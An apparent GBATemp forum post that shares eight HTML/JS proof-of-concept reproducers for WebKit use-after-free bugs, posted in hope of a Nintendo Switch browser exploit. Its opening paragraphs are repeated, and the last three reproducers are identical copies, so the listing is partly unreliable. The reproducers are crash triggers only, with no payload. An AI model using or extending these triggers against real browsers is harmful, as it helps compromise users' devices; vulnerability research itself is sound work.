Hello GBATemp! I recently discovered a whole bunch of proof-of-concept use-after-free exploits posted by the Google Security Team that target Apple WebKit. Since they were only published about a week ago, I figured there hasn't been a patch for them on the Switch yet. I will put those PoCs at the bottom of this post.
Now, before you start bringing the hype up, I want to remind you that these are only proof-of-concepts, and will not do anything at the moment besides maybe crashing the browser. Not all use-after-free vulnerabilities can be used to gain privileges or anything like that, and there's also ARM TrustZone that you have to worry about. However, the folks over at Google did publish a total of 8 UAF exploits within WebKit, so maybe there is hope.
Let's hope a more experienced developer will try and pick this up. I've been trying to use QEMU to emulate an aarch64 Debian distro with a Cortex-a57 CPU, but it's just too slow. So I figured the better solution was to buy a Raspberry Pi 3 and debug on that, so that should come in on Thursday.
Anyways, here is the HTML/JS for the 8 POC exploits. I hope this can become useful!
Now, before you start bringing the hype up, I want to remind you that these are only proof-of-concepts, and will not do anything at the moment besides maybe crashing the browser. Not all use-after-free vulnerabilities can be used to gain privileges or anything like that, and there's also ARM TrustZone that you have to worry about. However, the folks over at Google did publish a total of 8 UAF exploits within WebKit, so maybe there is hope.
Let's hope a more experienced developer will try and pick this up. I've been trying to use QEMU to emulate an aarch64 Debian distro with a Cortex-a57 CPU, but it's just too slow. So I figured the better solution was to buy a Raspberry Pi 3 and debug on that, so that should come in on Thursday.
Anyways, here is the HTML/JS for the 8 POC exploits. I hope this can become useful!
HTML:
<script>
// Reproducer 1 of 8 (posted as a WebKit use-after-free PoC; per the post the
// expected effect is at most a browser crash). Fuzzer-style test case: the
// statement order and the markup order below appear to be load-bearing, so
// do not reorder or "tidy" either when re-running it.
// The handlers reach elements through their ids as window globals
// (textarea1, textarea2, form), which is why the markup carries those ids.

// Entry point, wired to <body onload> below.
function jsfuzzer() {
// Replace the selected text of textarea1 with "foo".
textarea1.setRangeText("foo");
// Flag textarea2 for autofocus after it has already been parsed.
textarea2.autofocus = true;
textarea1.name = "foo";
// Move textarea2 from the end of the form to the front (its first child).
form.insertBefore(textarea2, form.firstChild);
// Programmatic submission; the form has no action, so it targets the page itself.
form.submit();
}
// Wired to the form's onchange below: grows the form by 100 <input> elements.
function eventhandler2() {
for(var i=0;i<100;i++) {
var e = document.createElement("input");
form.appendChild(e);
}
}
</script>
<body onload=jsfuzzer()>
<form id="form" onchange="eventhandler2()">
<textarea id="textarea1">a</textarea>
<object id="object"></object>
<textarea id="textarea2">b</textarea>
HTML:
<style>
.class9 { column-span: all; }
</style>
<script>
// Reproducer 2 of 8 (posted as a WebKit use-after-free PoC; per the post the
// expected effect is at most a browser crash). Fuzzer-style test case: keep
// the statement and markup order exactly as is when re-running it.
// NOTE(review): f() calls itself on its last line with no base case, so once
// started it recurses until the engine throws a stack-overflow error (or the
// crash under test happens first); this is presumably intentional.

// Entry point, wired to <body onload> below.
function f() {
// Indents the current selection inside the editable <pre> (-webkit-user-modify).
document.execCommand("indent", false);
// Anchor the selection at offset 16 of the <summary id="sum"> element and the
// focus at offset 6 of null. var00031 is never read (setBaseAndExtent returns
// undefined), so the assignment is only a leftover from the fuzzer.
var var00031 = window.getSelection().setBaseAndExtent(sum,16,null,6);
f();
}
</script>
<body onload=f()>
<pre style="column-count: 78; -webkit-user-modify: read-write">
<details>
<summary id="sum" class="class9">
<content id="htmlvar00040">
HTML:
<script>
// Reproducer 3 of 8 (posted as a WebKit use-after-free PoC; per the post the
// expected effect is at most a browser crash). Fuzzer-style test case: keep
// the statement and markup order exactly as is when re-running it.
// Elements are reached through their ids as window globals (iframe, del).

// Entry point, wired to <body onload> below.
function go() {
iframe.name = "foo";
// This form is created but never inserted into the document; it is submitted
// while still detached.
var form = document.createElement("form");
// Navigates the iframe to an inline data: document.
iframe.src = "data:text/html,foo";
form.submit();
// Runs f when the page starts to unload (e.g. as a result of the submission).
window.onbeforeunload = f;
}
// Moves the <del> element (which wraps the iframe in the markup below) out of
// the body and into <head>.
function f() {
document.head.appendChild(del);
}
</script>
<body onload=go()>
<del id="del">
<iframe id="iframe"></iframe>
HTML:
<script>
// Reproducer 4 of 8 (posted as a WebKit use-after-free PoC; per the post the
// expected effect is at most a browser crash). Fuzzer-style test case: keep
// the statement and markup order exactly as is when re-running it.
// Every handler is wrapped in an empty try/catch so that a thrown DOMException
// does not stop the remaining event handlers from firing.
// Trigger points in the markup below: <animate onbegin> and <iframe onload>
// -> eventhandler1, <select onfocus> -> eventhandler2, <text onload> ->
// eventhandler3. Two elements carry autofocus (the <keygen> and the <select>).
// NOTE(review): <keygen> is an obsolete element; whether it still parses as a
// form control depends on the engine build under test.

// Moves the <keygen> out of its form and into the SVG <text> element.
function eventhandler1() {
try { txt.appendChild(kg); } catch(e) { }
}
// Moves the <keygen> into the SVG <animate> element.
function eventhandler2() {
try { anim.appendChild(kg); } catch(e) { }
}
// Scrolls the (empty) table into view, aligning it to the top.
function eventhandler3() {
try { table.scrollIntoView(true); } catch(e) { }
}
</script>
<table id="table"></table>
<form>
<keygen id="kg" autofocus="autofocus">
</form>
<svg>
<animate id="anim" attributeName="text-anchor" from="middle" to="inherit" onbegin="eventhandler1()" />
<text id="txt" onload="eventhandler3()">
<font color="white"></font>
<select onfocus="eventhandler2()" autofocus="autofocus">
<textarea>a</textarea>
<iframe onload="eventhandler1()"></iframe>
HTML:
<style>
#colgrp { display: table-footer-group; }
.class1 { text-transform: capitalize; display: -webkit-box; }
</style>
<script>
// Reproducer 5 of 8 (posted as a WebKit use-after-free PoC; per the post the
// expected effect is at most a browser crash). Fuzzer-style test case: keep
// the statement and markup order exactly as is when re-running it.
// Elements are reached through their ids as window globals (textarea, option,
// col, link).

// Entry point, wired to <body onload> below.
function go() {
// Start (30) is greater than end (1) on an empty, readonly textarea; the
// engine is expected to clamp/swap these rather than throw.
textarea.setSelectionRange(30,1);
option.defaultSelected = true;
// The attribute name is misspelled relative to the ARIA attribute
// aria-labelledby, so it is set as a plain attribute with no ARIA meaning.
// Left as is: this is part of the reproducer.
col.setAttribute("aria-labeledby", "link");
}
</script>
<body onload=go()>
<link id="link">
<table>
<colgroup id="colgrp">
<col id="col" tabindex="1"></col>
<thead class="class1">
<th class="class1">
<textarea id="textarea" readonly="readonly"></textarea>
<option id="option"></option>
HTML:
<script>
// Reproducer 6 of 8 (posted as a WebKit use-after-free PoC; per the post the
// expected effect is at most a browser crash). Fuzzer-style test case: keep
// the statement and markup order exactly as is when re-running it.
// Elements are reached through their ids as window globals (circle, clippath,
// image, svg, details, button, div, q).
// Trigger points in the markup below: <body onload> -> jsfuzzer,
// <button onfocus> -> eventhandler1, <clipPath onload> -> eventhandler3;
// eventhandler2 is only attached at runtime by eventhandler3.

// Entry point: replaces the content of the <circle>'s nearest viewport
// element (the <svg> in this markup) with the text "foo", discarding its
// existing children, then selects the whole document.
function jsfuzzer() {
circle.nearestViewportElement.innerHTML = "foo";
document.execCommand("selectAll", false);
}
// Moves the <image> element into the <clipPath>.
function eventhandler1() {
clippath.appendChild(image);
}
// Moves the <details> element into the <svg>.
function eventhandler2() {
svg.appendChild(details);
}
function eventhandler3() {
document.execCommand("fontName", false, "foo");
button.autofocus = true;
// DOMNodeInserted is a deprecated mutation event; from here on every node
// insertion anywhere in the document runs eventhandler2.
window.addEventListener("DOMNodeInserted", eventhandler2);
// Moves <q> (and the <button> inside it) into the <div>.
div.appendChild(q);
}
</script>
<body onload=jsfuzzer()>
<q id="q">
<button id="button" onfocus="eventhandler1()">b</button>
</q>
<image id="image">
<details id="details" open="true">
<keygen autofocus="autofocus">
</details>
<div id="div"></div>
<svg id="svg">
<clipPath id="clippath" onload="eventhandler3()" />
<circle id="circle" />
</svg>
</html>
HTML:
<script>
// Reproducer 7 of 8 (posted as a WebKit use-after-free PoC; per the post the
// expected effect is at most a browser crash). As pasted, this listing is
// byte-for-byte the same as the preceding one; whether the post meant to
// include a different case here cannot be told from the page.
// Fuzzer-style test case: keep the statement and markup order exactly as is.
// Elements are reached through their ids as window globals (circle, clippath,
// image, svg, details, button, div, q).
// Trigger points in the markup below: <body onload> -> jsfuzzer,
// <button onfocus> -> eventhandler1, <clipPath onload> -> eventhandler3;
// eventhandler2 is only attached at runtime by eventhandler3.

// Entry point: replaces the content of the <circle>'s nearest viewport
// element (the <svg> in this markup) with the text "foo", discarding its
// existing children, then selects the whole document.
function jsfuzzer() {
circle.nearestViewportElement.innerHTML = "foo";
document.execCommand("selectAll", false);
}
// Moves the <image> element into the <clipPath>.
function eventhandler1() {
clippath.appendChild(image);
}
// Moves the <details> element into the <svg>.
function eventhandler2() {
svg.appendChild(details);
}
function eventhandler3() {
document.execCommand("fontName", false, "foo");
button.autofocus = true;
// DOMNodeInserted is a deprecated mutation event; from here on every node
// insertion anywhere in the document runs eventhandler2.
window.addEventListener("DOMNodeInserted", eventhandler2);
// Moves <q> (and the <button> inside it) into the <div>.
div.appendChild(q);
}
</script>
<body onload=jsfuzzer()>
<q id="q">
<button id="button" onfocus="eventhandler1()">b</button>
</q>
<image id="image">
<details id="details" open="true">
<keygen autofocus="autofocus">
</details>
<div id="div"></div>
<svg id="svg">
<clipPath id="clippath" onload="eventhandler3()" />
<circle id="circle" />
</svg>
</html>
HTML:
<script>
// Reproducer 8 of 8 (posted as a WebKit use-after-free PoC; per the post the
// expected effect is at most a browser crash). As pasted, this listing is
// byte-for-byte the same as the two preceding ones; whether the post meant to
// include a different case here cannot be told from the page.
// Fuzzer-style test case: keep the statement and markup order exactly as is.
// Elements are reached through their ids as window globals (circle, clippath,
// image, svg, details, button, div, q).
// Trigger points in the markup below: <body onload> -> jsfuzzer,
// <button onfocus> -> eventhandler1, <clipPath onload> -> eventhandler3;
// eventhandler2 is only attached at runtime by eventhandler3.

// Entry point: replaces the content of the <circle>'s nearest viewport
// element (the <svg> in this markup) with the text "foo", discarding its
// existing children, then selects the whole document.
function jsfuzzer() {
circle.nearestViewportElement.innerHTML = "foo";
document.execCommand("selectAll", false);
}
// Moves the <image> element into the <clipPath>.
function eventhandler1() {
clippath.appendChild(image);
}
// Moves the <details> element into the <svg>.
function eventhandler2() {
svg.appendChild(details);
}
function eventhandler3() {
document.execCommand("fontName", false, "foo");
button.autofocus = true;
// DOMNodeInserted is a deprecated mutation event; from here on every node
// insertion anywhere in the document runs eventhandler2.
window.addEventListener("DOMNodeInserted", eventhandler2);
// Moves <q> (and the <button> inside it) into the <div>.
div.appendChild(q);
}
</script>
<body onload=jsfuzzer()>
<q id="q">
<button id="button" onfocus="eventhandler1()">b</button>
</q>
<image id="image">
<details id="details" open="true">
<keygen autofocus="autofocus">
</details>
<div id="div"></div>
<svg id="svg">
<clipPath id="clippath" onload="eventhandler3()" />
<circle id="circle" />
</svg>
</html>